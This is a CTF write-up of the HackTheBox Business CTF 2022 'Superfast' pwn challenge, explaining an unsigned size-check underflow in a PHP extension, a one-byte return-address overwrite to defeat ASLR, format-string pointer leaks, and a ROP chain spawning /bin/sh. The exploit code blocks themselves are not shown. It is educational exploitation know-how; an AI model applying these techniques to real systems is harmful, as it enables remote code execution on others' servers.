Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
First looks
Finding primitives
Developing the ROP chain
Retrieving the flag
First looks
We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.
In /challenge/start.sh we can see that the challenge code gets bootstrapped using:
We can see that PHP loads php_logger.so as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.
One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so, I will run the challenge without Docker. I can run the PHP index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123. We can see it succeeds because it returns a 200 status code.
Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.
Analyzing php_logger.so
We can find the source code of php_logger.so in /src/php_logger.c. Under which, we can find the source code of log_cmd() as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return is valid - appends to the /tmp/log file.
This function does look safe, so the vulnerability is in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.
We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.
That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random,and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e, in the next program, it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the smallest 12 bits.
The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel - the manager of ASLR - can't work with addresses smaller than 4096 bytes.
Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.
The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.
When I try to fuzz using a script, I receive the following output:
However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl function in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:
Leaking the address of the PHP binary and the php_logger.so in memory.
dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable
We can generate a ROP chain automatically with pwntools:
Which gives the following ROP chain:
As we can see, it does the following:
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.